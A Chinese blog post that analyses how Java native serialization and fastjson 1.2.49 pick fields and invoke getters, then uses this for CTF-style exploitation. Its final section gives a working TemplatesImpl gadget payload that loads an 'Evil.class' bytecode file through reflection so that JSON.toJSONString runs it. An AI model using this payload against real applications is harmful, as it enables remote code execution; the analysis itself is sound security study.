<h1 id="序列化"><a href="#序列化" class="headerlink" title="序列化"></a>序列化</h1><p>序列化做的就是把对象的值提取出来，然后按照规定格式输出。所以序列化主要分为两个过程，一个是类的基本信息获取，比如field信息等，他需要知道后面我们到底要读取哪些字段，另一个就是获取字段值并写入输出流<br>那么就会涉及几个问题</p>
<ol>
<li>哪些字段会读取，哪些字段不会读取</li>
<li>怎么去获取这些字段的值？是利用反射去读取？还是利用getter?</li>
</ol>
<h2 id="java原生序列化"><a href="#java原生序列化" class="headerlink" title="java原生序列化"></a>java原生序列化</h2><h3 id="信息获取"><a href="#信息获取" class="headerlink" title="信息获取"></a>信息获取</h3><p>会处理继承关系，继承链上所有Serializable的类都会进行处理,按照从上往下的顺序进行<br>可以看到，在getDefaultSerialFields获取Fields的时候,只会保留非static非transient的field<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701508309233-e7da84b1-57e7-43f6-a500-56c58a930e72.png#averageHue=%232b2e35&clientId=ue1d751fb-8fb7-4&from=drop&id=u3a908808&originHeight=596&originWidth=1138&originalType=binary&ratio=2&rotation=0&showTitle=false&size=487620&status=done&style=none&taskId=u713e99df-4a24-4229-a3b0-35777018a10&title=" alt="截屏2023-12-02 17.11.44.png"></p>
<h3 id="获取值"><a href="#获取值" class="headerlink" title="获取值"></a>获取值</h3><p>writeSerialData按照从父类到子类的顺序进行处理（getClassDataLayout返回是按照从superclass-&gt;subclass的顺序）<br>因为序列化支持重写WriteObject,重写后可以自定义一些处理逻辑，我们这里只关注默认的处理逻辑也就是defaultWriteFields<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701654001759-05a34402-9fa5-487a-a928-94aacf6ae3c3.png#averageHue=%232a2e36&clientId=uebb5a96d-c261-4&from=drop&id=u8ecca07b&originHeight=490&originWidth=1186&originalType=binary&ratio=2&rotation=0&showTitle=false&size=399475&status=done&style=none&taskId=ub6555a5d-3f24-403d-8275-6164327adbf&title=" alt="截屏2023-12-04 09.39.57.png"><br>defaultWriteFields会处理当前类desc里面的所有fields（这里面的fields就是前面信息获取阶段留下的fields），在这里getPrimFieldValues获取基础类型的值，getObjFieldValues获取Obj<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701513902052-9f2bce80-560e-4686-9fbe-1c6e696122dd.png#averageHue=%23313339&clientId=ue1d751fb-8fb7-4&from=drop&id=ue515f4b8&originHeight=322&originWidth=758&originalType=binary&ratio=2&rotation=0&showTitle=false&size=204032&status=done&style=none&taskId=u51cf7a69-a382-49d0-a2c4-23ea9c0991d&title=" alt="截屏2023-12-02 18.44.57.png"><br>getPrimFieldValues和getObjFieldValues都是使用unsafe，使用unsafe的原因是可以不考虑访问权限，然后可以看到这两个函数都是逐个遍历对应的fields字段<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702296665465-52b810b3-f455-4a5a-8cb3-08433eccf365.png#averageHue=%23232427&clientId=ude7c4384-affb-4&from=drop&id=u12b9b0ca&originHeight=522&originWidth=1324&originalType=binary&ratio=2&rotation=0&showTitle=false&size=467292&status=done&style=none&taskId=uf7eba0d2-d638-4a71-bb50-740a2df24c1&title=" alt="截屏2023-12-11 20.10.59.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701513949372-f2cf4636-2a81-4aa5-a4fa-940423299632.png#averageHue=%23232427&clientId=ue1d751fb-8fb7-4&from=drop&id=u68540e88&originHeight=332&originWidth=1124&originalType=binary&ratio=2&rotation=0&showTitle=false&size=231114&status=done&style=none&taskId=u288ad26a-9582-4087-b512-97a12bc76dc&title=" alt="截屏2023-12-02 18.45.45.png"><br>后面调用writeObject0处理非基础类型字段的值,因为writeObject0会check是否是Serializable，如果我们字段是一个对象并且非Serializable的话，会报错（如果不赋值的话是null,虽然不会报错，但是也没有什么意义）<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701514038337-b2d333ef-9da2-40a4-98a2-eb76be64288c.png#averageHue=%232e2f33&clientId=ue1d751fb-8fb7-4&from=drop&id=u37b3ddb5&originHeight=110&originWidth=850&originalType=binary&ratio=2&rotation=0&showTitle=false&size=68578&status=done&style=none&taskId=udc354f59-5876-4f87-a836-ceced26452d&title=" alt="截屏2023-12-02 18.47.15.png"></p>
<h2 id="fastjson把对象转化为json"><a href="#fastjson把对象转化为json" class="headerlink" title="fastjson把对象转化为json"></a>fastjson把对象转化为json</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">            &lt;groupId&gt;com.alibaba&lt;/groupId&gt;</span><br><span class="line">            &lt;artifactId&gt;fastjson&lt;/artifactId&gt;</span><br><span class="line">            &lt;version&gt;1.2.49&lt;/version&gt;</span><br><span class="line">        &lt;/dependency&gt;</span><br></pre></td></tr></table></figure>
<p>首先对于fastjson来说他不关注是否是Serializable</p>
<h3 id="信息获取-1"><a href="#信息获取-1" class="headerlink" title="信息获取"></a>信息获取</h3><p>TypeUtils.buildBeanInfo这个函数里获取类的基本信息<br>首先获取所有field并放入Cache<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1699665946964-0eeb7536-c8fd-4018-9953-52ba758bbe9d.png#averageHue=%232d2e32&clientId=u47e58005-1321-4&from=drop&id=oFetT&originHeight=144&originWidth=1632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=186718&status=done&style=none&taskId=u221fdd32-522f-495b-8fb6-73848e8c1f1&title=" alt="截屏2023-11-11 09.25.41.png"><br>这里会遍历继承类，把所有的DeclaredFields都放入cache，这里注意，不会去判断是否是static<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564831784-7788f9d2-1d42-45f3-a580-fe313947b81d.png#averageHue=%2327282c&clientId=ubd959d35-4a9e-4&from=drop&id=u436dd705&originHeight=738&originWidth=1468&originalType=binary&ratio=2&rotation=0&showTitle=false&size=668418&status=done&style=none&taskId=u14eeb9ad-4803-4943-8948-04fa77113e5&title=" alt="截屏2023-12-03 08.53.45.png"><br>然后调用computeGetters处理fieldCacheMap<br>computeGetters顾名思义，处理getter的，大概分为两个部分<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1699687423734-1fa5e83d-0964-48ab-9d91-5497cdbdf053.png#averageHue=%23323844&clientId=u57e60602-fbb9-4&from=drop&id=TROc3&originHeight=230&originWidth=1114&originalType=binary&ratio=2&rotation=0&showTitle=false&size=206750&status=done&style=none&taskId=u37073922-d8b7-4960-9ef6-c5cb8e8eb89&title=" alt="截屏2023-11-11 15.23.40.png"></p>
<ol>
<li>处理Methods，调用getMethods获取包括继承的public方法，然后在函数里面做了一些判断,最后只留下包括继承的public的getter方法(is是boolean的getter),这里会做getter和Field的匹配，并保存在fieldInfoMap里</li>
<li>处理Fields,调用getFields获取包括继承的public成员变量，如果是static那么就跳过，如果已有的Map里面包含了对应的Fields，那么跳过，只会把没有包含的Field添加进去</li>
</ol>
<h4 id="处理methods"><a href="#处理methods" class="headerlink" title="处理methods"></a>处理methods</h4><p>代码里有比较长的逻辑用来判断函数是否是一个getter，具体的可以自己看一下（因为getter大概有什么要求还是有概念的，比如说非static，无参，返回值非void）<br>如果对应的getter匹配到了对应的字段，那么就生成一个fieldInfo放入Map里<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564355081-2182ed17-a47d-41db-b6ac-2f2932453777.png#averageHue=%23313b50&clientId=ubd959d35-4a9e-4&from=drop&id=u4dbf6b2a&originHeight=122&originWidth=1542&originalType=binary&ratio=2&rotation=0&showTitle=false&size=127961&status=done&style=none&taskId=u5c059e86-eafc-440c-9aab-a8ad66f2821&title=" alt="截屏2023-12-03 08.45.51.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564403925-cdf25913-2421-4731-baa1-f3735613d415.png#averageHue=%2337393d&clientId=ubd959d35-4a9e-4&from=drop&id=ub1220df3&originHeight=380&originWidth=916&originalType=binary&ratio=2&rotation=0&showTitle=false&size=280256&status=done&style=none&taskId=ue5bc823c-6352-4321-ac0e-dcbe91708b7&title=" alt="截屏2023-12-03 08.46.37.png"><br>那么这里也有可能出现没有匹配到field的情况，比如说我们这里随便写一个满足getter的函数，他最后生成的Fieldinfo就没有field<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564508167-880b027c-e4da-4b69-b383-6dfa2b43e57d.png#averageHue=%2334373a&clientId=ubd959d35-4a9e-4&from=drop&id=u5034789c&originHeight=400&originWidth=942&originalType=binary&ratio=2&rotation=0&showTitle=false&size=282545&status=done&style=none&taskId=u46584135-d221-4c10-b95b-eb217b9f20a&title=" alt="截屏2023-12-03 08.48.22.png"><br>这里也注意一个细节，getter对应的field可以是static的，因为parserAllFieldToCache不会判断field是否static<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701588438277-4b90e6d0-d741-4beb-9bb6-7926dd9bb4e2.png#averageHue=%2337393c&clientId=ubd959d35-4a9e-4&from=drop&id=u79336deb&originHeight=192&originWidth=976&originalType=binary&ratio=2&rotation=0&showTitle=false&size=144273&status=done&style=none&taskId=uda0c9fc4-9c6b-4e99-a894-a00b48195ec&title=" alt="截屏2023-12-03 15.27.12.png"></p>
<h4 id="处理fields"><a href="#处理fields" class="headerlink" title="处理fields"></a>处理fields</h4><p><em>如果子类中声明了一个与父类中同名的方法（并且签名相同），这在Java中被称为方法覆盖。字段和方法的继承规则有所不同。当子类和父类有同名的字段时，它们实际上是两个独立的实体，并没有被覆盖或重写的概念。这个特性是跟java的多态有关，多态在Java中主要通过方法重写和接口实现来实现，而静态方法、字段和构造器不参与多态。（提这个主要是前面getMethods时候，如果子类和父类同名，那么只会输出子类的，但是getFields就算重名也都会输出出来）</em><br>首先非static<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701568165705-2d0d845e-04f9-439e-8b3e-9a175b48629d.png#averageHue=%232c3039&clientId=ubd959d35-4a9e-4&from=drop&id=ue13ac271&originHeight=204&originWidth=880&originalType=binary&ratio=2&rotation=0&showTitle=false&size=131521&status=done&style=none&taskId=u121ebd40-6076-4df5-9378-d7598a47c67&title=" alt="截屏2023-12-03 09.49.20.png"><br>如果前面处理完methods后的fieldInfoMap里没有对应的字段，那么就新创建一个fieldInfo，设置methods为空,放入fieldInfoMap里<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701568203646-96ccb699-d61e-40ed-82cc-c83d8c9b67a5.png#averageHue=%232c313d&clientId=ubd959d35-4a9e-4&from=drop&id=u6ea3b458&originHeight=264&originWidth=1700&originalType=binary&ratio=2&rotation=0&showTitle=false&size=293136&status=done&style=none&taskId=u709251c9-dc9b-4485-b56b-e16160a6aaa&title=" alt="截屏2023-12-03 09.49.58.png"><br>那么在这个里面生成的fieldinfo都是没有method的<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701570720303-d61fe907-23ea-4fc7-9fee-ae607f743ad8.png#averageHue=%2335373b&clientId=ubd959d35-4a9e-4&from=drop&id=u69348880&originHeight=342&originWidth=870&originalType=binary&ratio=2&rotation=0&showTitle=false&size=226876&status=done&style=none&taskId=u0e964a17-efcb-4b13-9145-955687ac024&title=" alt="截屏2023-12-03 10.31.54.png"></p>
<h3 id="获取值-1"><a href="#获取值-1" class="headerlink" title="获取值"></a>获取值</h3><p>fastjson有两种Serializer，一种是JavaBeanSerializer，一种是ASMSerializer<br>默认情况下会使用asm，但是asm动态生成的类不方便调试，所以我们先分析使用JavaBeanSerializer的方式</p>
<h4 id="JavaBeanSerializer"><a href="#JavaBeanSerializer" class="headerlink" title="JavaBeanSerializer"></a>JavaBeanSerializer</h4><p>首先关上asm</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">SerializeConfig.getGlobalInstance().setAsmEnable(false);</span><br><span class="line">        User user = new User();</span><br><span class="line">        System.out.println(JSON.toJSONString(user));</span><br><span class="line">//两种都可以</span><br><span class="line">//SerializeConfig serializeConfig = new SerializeConfig();</span><br><span class="line">//       serializeConfig.setAsmEnable(false);</span><br><span class="line">//        User user = new User();</span><br><span class="line">//        System.out.println(JSON.toJSONString(user,serializeConfig));</span><br></pre></td></tr></table></figure>
<p>如果关了asm，那么写入的逻辑在JavaBeanSerializer.write里，这里会依次遍历getter, 然后有下面两个判断<br>1.默认是会skipTransient的，所以只会写入非Transient的field（当然没有field是不受影响的），<br>2.ignoreNonFieldGetter默认为false，所以有些没有field的getter也是不受影响的<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702431519233-f4c6954d-f071-42d4-8565-ecc6f3d3887a.png#averageHue=%23222326&clientId=udb71fb31-d230-4&from=drop&id=u31c67672&originHeight=598&originWidth=1284&originalType=binary&ratio=2&rotation=0&showTitle=false&size=449613&status=done&style=none&taskId=ub758a5c9-b433-4a21-8065-f17ff332817&title=" alt="截屏2023-12-13 09.38.31.png"><br>获取value<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701587059285-8e3f6737-9529-44c5-8c7f-938529d2b725.png#averageHue=%232e323a&clientId=ubd959d35-4a9e-4&from=drop&id=u44911623&originHeight=104&originWidth=830&originalType=binary&ratio=2&rotation=0&showTitle=false&size=76097&status=done&style=none&taskId=ucc1680be-b54d-46db-9185-cccd46c252c&title=" alt="截屏2023-12-03 15.04.15.png"><br>如果有getter，执行getter，没有直接用反射去获取<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701587080912-152afac2-dcdc-4a48-a4bd-4002315164e0.png#averageHue=%2327282c&clientId=ubd959d35-4a9e-4&from=drop&id=u54664ef4&originHeight=248&originWidth=1572&originalType=binary&ratio=2&rotation=0&showTitle=false&size=240363&status=done&style=none&taskId=u54e87ea2-0768-402c-8595-b92fabdc34f&title=" alt="截屏2023-12-03 15.04.36.png"></p>
<h4 id="ASMSerializer"><a href="#ASMSerializer" class="headerlink" title="ASMSerializer"></a>ASMSerializer</h4><p>在处理的时候，如果遇到field是null的getter，会进行一个特殊处理<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702471452099-2e52bffc-69dd-42ec-906b-df502668f4fd.png#averageHue=%23272c35&clientId=ue8a8d680-578e-4&from=drop&id=kp35b&originHeight=362&originWidth=1428&originalType=binary&ratio=2&rotation=0&showTitle=false&size=366618&status=done&style=none&taskId=u2db20dd5-f5de-4e21-a5e1-4beb4138cf5&title=" alt="截屏2023-12-13 20.44.05.png"><br>如果遇见字段是Transient的也会进行特殊处理<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702471617786-ced4d710-f240-4353-ac98-c870578a7e77.png#averageHue=%23292e39&clientId=ue8a8d680-578e-4&from=drop&id=u3f156e1c&originHeight=280&originWidth=1426&originalType=binary&ratio=2&rotation=0&showTitle=false&size=304322&status=done&style=none&taskId=u6ad33f14-153b-4467-aef0-70f278a585a&title=" alt="截屏2023-12-13 20.46.52.png"><br>在这里可以把对应的asm动态类字节码dump出来<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702470165687-b40233f4-d8e8-4070-ad69-c0ef8e4f72a8.png#averageHue=%232e323b&clientId=u78384bae-71f5-4&from=drop&id=u48a771e2&originHeight=210&originWidth=1824&originalType=binary&ratio=2&rotation=0&showTitle=false&size=288764&status=done&style=none&taskId=ufd612eee-d971-49eb-8cbf-8d90148d23b&title=" alt="截屏2023-12-13 20.22.41.png"><br>查看动态类的代码，如果getter的field是Transient的话，他会判断是否开启了SkipTransientField（1024），如果没有开启，他会把值写到json字符串里，如果开启了就会跳过 (这一点来说有些不同，对于Transient的字段来说，默认情况下走asm的话他是会调用getter的，不走asm的话是不会调用getter的)<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702470333156-bbab87df-8056-472d-baa5-fc530ee32fb6.png#averageHue=%2328292c&clientId=u78384bae-71f5-4&from=drop&id=uddeeccab&originHeight=284&originWidth=774&originalType=binary&ratio=2&rotation=0&showTitle=false&size=165753&status=done&style=none&taskId=u9bd35320-6e8a-4042-b083-a0ba76dc3b1&title=" alt="截屏2023-12-13 20.25.28.png"><br>而对于没有field的getter来说，他会判断是否开启了IgnoreNonFieldGetter (33554432),如果没有开启，他会进一步去调用getter把值写到json字符串里，如果开启了，那么就跳过，这个倒和前面的保持一致<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702470891251-9d90d4de-4865-4ba7-a8e1-700e42bb2eaa.png#averageHue=%2325272a&clientId=u8815ac92-5b59-4&from=drop&id=ubf1c0992&originHeight=494&originWidth=1162&originalType=binary&ratio=2&rotation=0&showTitle=false&size=398376&status=done&style=none&taskId=u98ce2573-46d8-4d28-b30c-74705f5efa3&title=" alt="截屏2023-12-13 20.34.47.png"><br>而对于普通的getter来说，就比较简单，调用getter然后输出<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702471950651-6da488f6-39d9-434a-bd43-425386dbccd9.png#averageHue=%232d2e31&clientId=ue8a8d680-578e-4&from=drop&id=u69eb685d&originHeight=136&originWidth=782&originalType=binary&ratio=2&rotation=0&showTitle=false&size=92698&status=done&style=none&taskId=u92d0c837-4049-41e5-8487-12c3ea0b628&title=" alt="截屏2023-12-13 20.52.25.png"><br>对于没有getter的情况，asm也是直接获取值,然后输出<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702472147655-ea389a94-e0d9-4276-acad-b43e06c6bbab.png#averageHue=%232b2d30&clientId=ue8a8d680-578e-4&from=drop&id=u39a7ead0&originHeight=138&originWidth=804&originalType=binary&ratio=2&rotation=0&showTitle=false&size=93600&status=done&style=none&taskId=u25859664-37d0-4aaf-978a-87ca881e8ab&title=" alt="截屏2023-12-13 20.55.42.png"><br>当然可能还会遇见其他值的feature，比如说128，像这种就是一些对于值的处理逻辑，就不过多赘述了<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702472200932-174237e5-d8f5-45b1-97f5-03dc364b9bb8.png#averageHue=%23f9f9f9&clientId=u0fc7f195-d1ba-4&from=drop&id=u04e0bd3a&originHeight=66&originWidth=488&originalType=binary&ratio=2&rotation=0&showTitle=false&size=34943&status=done&style=none&taskId=u6daf728d-5408-4f48-af8d-cb1e8bc0b8c&title=" alt="截屏2023-12-13 20.56.33.png"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ol>
<li>java原生序列化会判断是否Serializable，fastjson不会</li>
<li>二者都会处理子类以及继承来的字段</li>
<li>原生序列化要求字段非static非Transient，而对于fastjson来说，如果是被public的getter匹配到的字段只要求非Transient，如果没有匹配到的要满足public非static非Transient</li>
<li>原生序列化获取值是通过unsafe反射来获取，对于fastjson来说，有getter的是通过getter，没getter的通过反射</li>
</ol>
<p>可以看到，java原生序列化里默认情况下是不会调用类自己的函数，除非重写writeObject，但是fastjson是会调用getter的，如果类的getter里面有危险操作，那么就可能带来风险。所以如果在题目里发现存在恶意的getter方法，那么可以考虑结合fastjson的toString\toJSONString来利用,在CTF里面常用来配合java原生的反序列化来调用恶意的getter。</p>
<h1 id="细节"><a href="#细节" class="headerlink" title="细节"></a>细节</h1><p>通过前面部分，对fastjson序列化大体上的逻辑和思路已经有了一个认识，那么这部分主要是解决一些细节上的问题，比如说，getter的调用顺序是什么？</p>
<h2 id="getter的调用顺序"><a href="#getter的调用顺序" class="headerlink" title="getter的调用顺序"></a>getter的调用顺序</h2><p>在computeGetters的最后，会调用getFieldInfos把map结构转化为一个list<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300124899-61f8732e-7a1a-4b29-9b95-8ae4e906edf4.png#averageHue=%232a2d35&clientId=ude7c4384-affb-4&from=drop&id=ud44f9241&originHeight=476&originWidth=1142&originalType=binary&ratio=2&rotation=0&showTitle=false&size=420687&status=done&style=none&taskId=u7d9fbafb-d637-4b6d-b42c-41400417f9c&title=" alt="截屏2023-12-11 21.08.40.png"><br>然后会调用sort进行排序<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300261054-92dca6c7-164e-4b9f-8816-9dd5d409fe00.png#averageHue=%23303440&clientId=ude7c4384-affb-4&from=drop&id=uf96dcef1&originHeight=112&originWidth=1090&originalType=binary&ratio=2&rotation=0&showTitle=false&size=102113&status=done&style=none&taskId=u97bc98a4-bae2-4c78-b666-a4e76076a9e&title=" alt="截屏2023-12-11 21.10.56.png"><br>在FieldInfo的compareTo可以看到是对name进行了排序（对于没有field对应的getter来说，他的name就是getter函数解析以后的属性名）<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300308970-0ce49a78-81d7-49bb-8870-12fd8bbcbf36.png#averageHue=%23304260&clientId=ude7c4384-affb-4&from=drop&id=uf7e2451c&originHeight=70&originWidth=716&originalType=binary&ratio=2&rotation=0&showTitle=false&size=47162&status=done&style=none&taskId=ub4edc03a-06e9-4407-a495-49a887d0145&title=" alt="截屏2023-12-11 21.11.44.png"><br>然后把我们排序好的Fields放到BeanInfo里<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300481559-dc3122b7-3e40-49d7-9681-491fe909bdf6.png#averageHue=%232a2f3a&clientId=ude7c4384-affb-4&from=drop&id=u4d71bf81&originHeight=292&originWidth=1624&originalType=binary&ratio=2&rotation=0&showTitle=false&size=314096&status=done&style=none&taskId=u5f3ec5b6-c003-46eb-8758-f8c698d1b95&title=" alt="截屏2023-12-11 21.14.36.png"></p>
<h4 id="JavaBeanSerializer-1"><a href="#JavaBeanSerializer-1" class="headerlink" title="JavaBeanSerializer"></a>JavaBeanSerializer</h4><p>在JavaBeanSerializer的构造函数里面，会把前面的sortedFields再生成FieldSerializer<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702348517275-dffac77e-b2ff-4192-a582-b329d766c8a9.png#averageHue=%23242528&clientId=u355dda8b-f906-4&from=drop&id=u48eb4aae&originHeight=216&originWidth=1422&originalType=binary&ratio=2&rotation=0&showTitle=false&size=210364&status=done&style=none&taskId=ua54dcb12-f9bf-461b-a921-6ea12f96beb&title=" alt="截屏2023-12-12 10.35.10.png"><br>然后在JavaBeanSerializer的write里面会进行判断<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300629757-01c88b92-05cf-43b1-abd5-8274233782b4.png#averageHue=%23272c39&clientId=ude7c4384-affb-4&from=drop&id=u779fb78d&originHeight=238&originWidth=612&originalType=binary&ratio=2&rotation=0&showTitle=false&size=116254&status=done&style=none&taskId=u60a9e9ef-2740-4064-8a8e-5cbdee0cb7a&title=" alt="截屏2023-12-11 21.17.03.png"><br>而我们默认创建的时候，传入的DEFAULT_FEATURE里包含了sortField<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702299898306-219fdca1-3d5c-4dfe-9252-11c4974246f1.png#averageHue=%23242529&clientId=ude7c4384-affb-4&from=drop&id=u5bfe400a&originHeight=836&originWidth=1772&originalType=binary&ratio=2&rotation=0&showTitle=false&size=886389&status=done&style=none&taskId=uedd8d55e-b3e1-47d8-bf1e-28bd2e0e108&title=" alt="截屏2023-12-11 21.04.54.png"><br>所以在这里，我们的getters就变成了按照属性名排列的getters<br>然后就是按照顺序遍历getters，调用getPropertyValueDirect获取值<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301113898-60e27d3c-c5ba-4085-975a-756b4ba74dc4.png#averageHue=%2326282d&clientId=ude7c4384-affb-4&from=drop&id=u51d3ae3d&originHeight=1204&originWidth=1330&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1076715&status=done&style=none&taskId=u89baf4d8-c04b-44a6-abf7-7c6f45eebbb&title=" alt="截屏2023-12-11 21.25.08.png"></p>
<h4 id="ASMSerializer-1"><a href="#ASMSerializer-1" class="headerlink" title="ASMSerializer"></a>ASMSerializer</h4><p>从BeanInfo里拿出排序好的getters<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702472812328-1d7996e9-0656-4bfd-84dd-fb8d946dc46e.png#averageHue=%23334160&clientId=u0fc7f195-d1ba-4&from=drop&id=u88390841&originHeight=78&originWidth=720&originalType=binary&ratio=2&rotation=0&showTitle=false&size=51082&status=done&style=none&taskId=u5de80f43-da33-49ca-bdd2-727819d5b43&title=" alt="截屏2023-12-13 21.06.46.png"><br>在generateWriteMethod里按照顺序遍历getter动态生成对应代码<img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702473034420-6aac5ba6-9582-47f3-87bf-cf65769ba2d6.png#averageHue=%2327282c&clientId=u0fc7f195-d1ba-4&from=drop&id=u70966902&originHeight=1072&originWidth=1412&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1077857&status=done&style=none&taskId=u1adc9aee-82e3-4883-b573-18241c0ac4e&title=" alt="截屏2023-12-13 21.10.29.png"></p>
<h1 id="fastjson-TemplatesImpl"><a href="#fastjson-TemplatesImpl" class="headerlink" title="fastjson+TemplatesImpl"></a>fastjson+TemplatesImpl</h1><p>对于TemplatesImpl来说，第一个就是outputProperties<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301484512-254e7453-f4d9-474c-b074-b1031beaa1e2.png#averageHue=%232f3135&clientId=ude7c4384-affb-4&from=drop&id=u99d1d337&originHeight=434&originWidth=816&originalType=binary&ratio=2&rotation=0&showTitle=false&size=258707&status=done&style=none&taskId=u4577c45a-2990-4e50-873e-3c02cf1b3e6&title=" alt="截屏2023-12-11 21.31.20.png"><br>直接调用newTransformer触发exp<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301513886-b2e722ef-a3c7-4dd8-b85d-fc00eed290e5.png#averageHue=%2325272b&clientId=ude7c4384-affb-4&from=drop&id=u93a4f7e8&originHeight=374&originWidth=910&originalType=binary&ratio=2&rotation=0&showTitle=false&size=240678&status=done&style=none&taskId=u070fb2a4-7ab0-4827-bb2e-16a973cd8a5&title=" alt="截屏2023-12-11 21.31.50.png"><br>payload</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">byte[] bytecode = Files.readAllBytes(Paths.get(<span class="string">&quot;/Users/xuemo/Desktop/java_project/debug/target/classes/Evil.class&quot;</span>));</span><br><span class="line">        TemplatesImpl templates = new TemplatesImpl();</span><br><span class="line">        Field bytecodes = templates.getClass().getDeclaredField(<span class="string">&quot;_bytecodes&quot;</span>);</span><br><span class="line">        bytecodes.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        bytecodes.<span class="built_in">set</span>(templates,new byte[][]&#123;bytecode&#125;);</span><br><span class="line">        Field name = templates.getClass().getDeclaredField(<span class="string">&quot;_name&quot;</span>);</span><br><span class="line">        name.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        name.<span class="built_in">set</span>(templates,<span class="string">&quot;azraelxuemo&quot;</span>);</span><br><span class="line">        Field _tfactory = templates.getClass().getDeclaredField(<span class="string">&quot;_tfactory&quot;</span>);</span><br><span class="line">        _tfactory.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        _tfactory.<span class="built_in">set</span>(templates,new TransformerFactoryImpl());</span><br><span class="line">        JSON.toJSONString(templates);</span><br></pre></td></tr></table></figure>
<p>调用栈(没有使用asm的)<br><img src="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301648356-d57c37b6-8c70-4441-84a5-a4d5304be277.png#averageHue=%233e3529&clientId=ude7c4384-affb-4&from=drop&id=uabada70e&originHeight=788&originWidth=974&originalType=binary&ratio=2&rotation=0&showTitle=false&size=643066&status=done&style=none&taskId=ue3006e51-9066-4b96-a85e-c8b54ee0da3&title=" alt="截屏2023-12-11 21.34.01.png"></p>

    </article>
    <!-- license -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://azraelxuemo.github.io">azraelxuemo</a>
            <p>Link：<a href="https://azraelxuemo.github.io/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/">https://azraelxuemo.github.io/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/</a>
            <p>Publish date：<a href="https://azraelxuemo.github.io/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/">December 11th 2023, 9:21:34 pm</a>
            <p>Update date：<a href="https://azraelxuemo.github.io/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/">December 13th 2023, 9:24:36 pm</a>
            <p>License：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2023/12/23/dnslog%E6%A3%80%E6%B5%8B%E8%BF%9C%E7%A8%8B%E4%BE%9D%E8%B5%96/" title="dnslog检测远程依赖">
                    <div class="nextTitle">dnslog检测远程依赖</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2023/12/03/JNI/" title="JNI">
                    <div class="prevTitle">JNI</div>
                </a>
            
        </li>
    </ul>
    <!-- comment -->
    
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->


            

            

            

            <!-- utteranc评论 -->


            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->


            
            

            

        </div>
    
    <!-- timeliness note -->
